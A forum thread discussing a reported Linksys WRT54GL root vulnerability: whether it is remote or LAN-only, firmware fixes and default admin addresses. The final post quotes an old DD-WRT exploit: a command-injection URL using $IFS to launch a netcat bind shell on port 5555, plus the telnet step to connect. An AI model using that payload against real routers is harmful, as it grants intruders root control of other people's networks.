dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
4533

antdude
Matrix Ant
Premium Member
join:2001-03-25
US

antdude

Premium Member

Dangerous remote Linksys 0-day root exploit discovered

01:51PM »www.net-security.org/sec ··· id=14234

Uh oh. I have that old router too!

stormbow
Freedom isn't FREE
Premium Member
join:2002-07-31
Simi Valley, CA

stormbow

Premium Member

Which models though, all of them? It doesn't seem like the author has a clue that Linksys is a brand not a model.

Smokey Bear
veritas odium parit
Premium Member
join:2008-03-15
Annie's Pub

1 recommendation

Smokey Bear to antdude

Premium Member

to antdude
DefenseCode Security YouTube vulnerability demonstration:

»www.youtube.com/watch?v= ··· FKE&hd=1

According to DefenseCode: "exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected."

StuartMW
Premium Member
join:2000-08-06

1 recommendation

StuartMW

Premium Member

I think Linksys routers are Linux or VxWorks based so the exploit might be general to the product line.
Mele20
Premium Member
join:2001-06-05
Hilo, HI

Mele20 to antdude

Premium Member

to antdude
That article said Linksy was issuing a fix...for that old of a Linksy router? I am surprised if that is true. I'm sure they won't be issuing a fix for my nine year old Linksy router which isn't even the last version of that router. The last version would be about eight years old.

kickass69
join:2002-06-03
Lake Hopatcong, NJ

kickass69 to antdude

Member

to antdude
I have the WRT54GL as mentioned at the bottom of the article. But since I use DD-WRT I don't have to worry about that exploit it seems.

siljaline
I'm lovin' that double wide
Premium Member
join:2002-10-12
Montreal, QC

1 recommendation

siljaline to antdude

Premium Member

to antdude
»blog.defensecode.com/201 ··· ing.html
quote:
Months ago, we've contacted Cisco about a remote preauth (root access) vulnerability in default installation of their Linksys routers that we've discovered.
We gave them detailed vulnerability description along with the PoC exploit for the vulnerability.

They said that this vulnerability was already fixed in latest firmware release...
Well, not this particular vulnerability, since the latest official Linksys firmware - 4.30.14, and all previous versions are still vulnerable.

Exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected.
Cisco Linksys is a very popular router with more than 70,000,000 routers sold.
That's why we think that this vulnerability deserves attention.

trparky
Premium Member
join:2000-05-24
Cleveland, OH

trparky

Premium Member

Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?

AVD
Respice, Adspice, Prospice
Premium Member
join:2003-02-06
Onion, NJ

AVD to antdude

Premium Member

to antdude
I can't see the YT, but what is the attack vector? If I have a linksys with a wpa encryption am I vulnerable?

Is the attack through the with an unassociated computer, someone on the lan or wlan or through the WAN port?

siljaline
I'm lovin' that double wide
Premium Member
join:2002-10-12
Montreal, QC

siljaline to trparky

Premium Member

to trparky
said by trparky:

Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?

Best bet would be to ask Cisco or see what's going on: »Cisco

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

NetFixer to antdude

Premium Member

to antdude
said by antdude:

01:51PM »www.net-security.org/sec ··· id=14234

Uh oh. I have that old router too!

As I said in my reply in the other thread on this same subject: »Re: Dangerous remote Linksys 0-day root exploit discovered!
said by [NetFixer :

What is being demonstrated in their video is not a remote exploit. Launching an application targeting 192.168.1.1 is not going to access a remote router.

Perhaps they have more that they are not showing in the video, but accessing a router from its LAN interface is not necessarily the same as accessing it from its WAN interface (which would be a requirement to be called a remote exploit). If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).


StuartMW
Premium Member
join:2000-08-06

StuartMW

Premium Member

Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

NetFixer

Premium Member

said by StuartMW:

Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).

Many of the Linksys routers have an internal header that can be converted to a serial interface, but I have never run across a Linksys router (and make no mistake, it is Linksys routers that are being discussed, not real Cisco routers) that had an actual external serial interface from the factory (not even their business class routers have them). However even if the router(s) in question had serial ports, one would not be accessing a serial port via 192.168.1.1 as is shown in the POC video.

StuartMW
Premium Member
join:2000-08-06

1 edit

StuartMW

Premium Member

Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

I do have "remote access" on the LAN side but only over HTTPS plus you need my personal certificate. Paranoid? You betchya

(You're not paranoid if they really are out to get you)

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

1 recommendation

NetFixer

Premium Member

said by StuartMW:

Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface. I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability. This practice may not be universal for all Linksys routers, but I have found it to be so on many of them...my Cisco/Linksys/Vonage RTP300 seems to be an exception to that rule, but it uses Vonage firmware instead of Linksys firmware.

StuartMW
Premium Member
join:2000-08-06

1 recommendation

StuartMW

Premium Member

said by NetFixer:

I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability.

Well as software engineers say "it's a feature not a bug"

I agree that just allows anyone on any subnet to get to the router. WTF?

AVD
Respice, Adspice, Prospice
Premium Member
join:2003-02-06
Onion, NJ

AVD to NetFixer

Premium Member

to NetFixer
said by NetFixer:

They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

is this true? If I have router A (192.168.1.xxx) plugged into router B (192.168.22.xxx) and I have a device with a browser on "B"'s lan and type 192.168.1.1 do I still get "B"s admin page? I can't say I've ever encountered this, and I've been in this environment many times.
AVD

AVD to NetFixer

Premium Member

to NetFixer
said by NetFixer:

said by [NetFixer :

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same a physical/software security.

StuartMW
Premium Member
join:2000-08-06

StuartMW

Premium Member

said by AVD:

A public user on the wlan should not be able to root the router.

Valid point.

Devices on my WLAN or other subnets (than the one my PC's are in) cannot access my router.

EGeezer
Premium Member
join:2002-08-04
Midwest

EGeezer to NetFixer

Premium Member

to NetFixer
said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.
ke4pym
Premium Member
join:2004-07-24
Charlotte, NC

ke4pym to antdude

Premium Member

to antdude
Hey, since Cisco is going to go back to fix this bug, maybe they can fix it so you can use modern browsers to access the administrator console!

Or would that be asking too much?
pandora
Premium Member
join:2001-06-01
Outland

pandora to Smokey Bear

Premium Member

to Smokey Bear
The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video -

We're still investigating some tricks to exploit this vulnerability from the internet, but for now, yes - it seems safe from the outside of the network. Of course, unless services are available from the internet.

Regards,

Leon Juranic

CEO

DefenseCode



It isn't clear if this exploit affects Tomato, Tomato USB, DD-WRT or any other open source variant of Linux based routers.

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

NetFixer to AVD

Premium Member

to AVD
said by AVD:

said by NetFixer:

said by [NetFixer :

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same a physical/software security.

And a properly setup public WiFi hotspot will not allow access by WiFi guests to the underlying infrastructure, or between WiFi clients. I have setup many such hotspots, and I used at least small business class routers and separate access points that can be setup to be secure. I have never setup a public WiFi hotspot using a residential grade WiFi router (although I have replaced those with proper equipment).

[sermon]Any business that operates a public WiFi hotspot without using the proper equipment that has been securely configured is just begging to be owned.[/sermon]

BoToMaTiC
join:2003-10-29
Louisville, KY

1 recommendation

BoToMaTiC

Member

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en ··· /WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

antdude
Matrix Ant
Premium Member
join:2001-03-25
US

antdude

Premium Member

said by BoToMaTiC:

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en ··· /WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

XSS = Cross Site Scripting?

no__1__here
Premium Member
join:2003-10-13
Tomball, TX

no__1__here to pandora

Premium Member

to pandora
said by pandora:

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

NetFixer to EGeezer

Premium Member

to EGeezer
said by EGeezer:

said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.

Yes, that (like the vulnerability this thread is about) is strictly a LAN side vulnerability, but an unnecessary one in my opinion. It just makes an XSS attack (which the vulnerability this thread is about seems to be) that much easier. Changing the default values for the LAN side of a residential/soho router has long been a sage security recommendation, and a deliberate bypassing of that measure by the manufacturer just does not seem like a wise move to me.
pandora
Premium Member
join:2001-06-01
Outland

1 recommendation

pandora to no__1__here

Premium Member

to no__1__here
said by no__1__here:

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

Cisco's patch is up for the WRT54GL, says it fixes issue with XSS (cross site scripting).

siljaline
I'm lovin' that double wide
Premium Member
join:2002-10-12
Montreal, QC

1 recommendation

siljaline to antdude

Premium Member

to antdude
Unless already mentioned:
Linksys vuln: Cisco responds - Working on fix for WRT54GL router
»www.theregister.co.uk/20 ··· ys_vuln/

NetFixer
From My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Netgear CM500
Pace 5268AC
TRENDnet TEW-829DRU

NetFixer to antdude

Premium Member

to antdude
Could this "new" exploit just be a variation of an old (2009) Linksys/DD-WRT router vulnerability?

Amazing new exploit for Linksys routers running DD-WRT

The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p \5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555